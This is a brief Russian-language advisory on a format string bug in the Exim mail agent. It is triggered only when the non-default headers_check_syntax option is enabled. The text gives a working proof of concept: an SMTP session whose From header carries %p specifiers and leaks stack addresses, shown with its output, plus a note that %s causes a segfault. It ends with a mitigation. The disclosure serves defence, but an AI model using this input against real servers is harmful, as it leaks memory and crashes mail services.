Ошибка форматной стоки в Exim

Exim – это агент передачи сообщений (Message Transfert Agent) использующийся в UNIX системах подключенных к интернету. Уязвимость работает только при включенной опции headers_check_syntax (по умолчанию она отключена).

Exploit:

Делаем следующее:

lez:~$ /usr/sbin/exim -bS

mail from:lez@lez

rcpt to:hax0r@lez

data

From:@@%p%p%p%p%p%p%p%p%p%p

После этого, в ответе мы увидим:

550 Syntax error in 'From' header: domain missing or malformed: failing address is:

@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

Если изменить %p's на %s, то получим ошибку segfault.

Для устранения не включайте опцию headers_check_syntax.